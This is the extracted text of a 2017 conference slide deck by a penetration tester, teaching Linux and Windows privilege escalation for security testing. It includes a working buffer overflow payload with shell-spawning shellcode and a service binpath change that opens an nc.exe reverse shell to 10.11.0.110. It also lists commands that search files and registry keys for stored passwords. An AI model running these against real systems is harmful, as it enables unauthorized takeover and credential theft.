Successfully reported this slideshow.
Your SlideShare is downloading. ×

How fun of privilege escalation Red Pill2017

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Loading in …3
×

Check these out next

1 of 123 Ad
Advertisement

More Related Content

Slideshows for you (20)

Similar to How fun of privilege escalation Red Pill2017 (20)

Advertisement

Recently uploaded (20)

How fun of privilege escalation Red Pill2017

  1. 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  2. 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  3. 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  4. 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  5. 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  6. 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  7. 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  8. 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  9. 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  10. 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  11. 11. # Remote and Local Exploitation Root
  12. 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  13. 13. # “Privilege Escalation”
  14. 14. # “Privilege Escalation”
  15. 15. # “Privilege Escalation”
  16. 16. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
  17. 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
  18. 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  19. 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
  20. 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
  21. 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  22. 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  23. 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
  24. 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
  25. 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  26. 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  27. 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  28. 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  29. 29. #objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  30. 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
  31. 31. #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  32. 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  33. 33. # “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
  34. 34. # “Privilege Escalation” Ways for Linux
  35. 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  36. 36. # “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
  37. 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
  38. 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  39. 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  40. 40. # “Privilege Escalation” Ways for Linux
  41. 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  42. 42. # “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
  43. 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  44. 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  45. 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
  46. 46. # “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
  47. 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  48. 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  49. 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  50. 50. # “Privilege Escalation” Ways for Linux • Case Study :
  51. 51. # “Privilege Escalation” Ways for Linux • Case Study :
  52. 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  53. 53. # “Privilege Escalation” Ways for Linux • Case Study :
  54. 54. # “Privilege Escalation” Ways for Linux • Case Study :
  55. 55. Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
  56. 56. # “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
  57. 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  58. 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
  59. 59. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  60. 60. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  61. 61. # Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
  62. 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  63. 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  64. 64. • PS Migration # “Privilege Escalation” Ways for Windows
  65. 65. • PS Migration # “Privilege Escalation” Ways for Windows
  66. 66. • PS Migration # “Privilege Escalation” Ways for Windows
  67. 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
  68. 68. c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
  69. 69. # Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
  70. 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
  71. 71. # Remote Exploit to escalate privilege • Credential store in registry
  72. 72. # Remote Exploit to escalate privilege
  73. 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  74. 74. # Remote Exploit to escalate privilege
  75. 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  76. 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  77. 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  78. 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  79. 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
  80. 80. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
  81. 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  82. 82. # “Privilege Escalation” Ways for Windows
  83. 83. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
  84. 84. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
  85. 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  86. 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  87. 87. # “Privilege Escalation” Ways for Windows
  88. 88. # “Privilege Escalation” Ways for Windows
  89. 89. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  90. 90. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  91. 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
  92. 92. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  93. 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  94. 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  95. 95. https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows
  96. 96. https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows • DLL Hijacking
  97. 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
  98. 98. https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
  99. 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  100. 100. • HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
  101. 101. # “Privilege Escalation” Ways for Windows • Pass-th-Hash
  102. 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  103. 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  104. 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  105. 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  106. 106. # “Privilege Escalation” Ways for Windows
  107. 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  108. 108. # “Privilege Escalation” Ways for Windows
  109. 109. dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
  110. 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  111. 111. # “Privilege Escalation” Ways for Windows
  112. 112. # “Privilege Escalation” Ways for Windows
  113. 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  114. 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  115. 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  116. 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  117. 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
  118. 118. # “Privilege Escalation” on other devices
  119. 119. # Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
  120. 120. Q & A
  121. 121. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  122. 122. • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References

×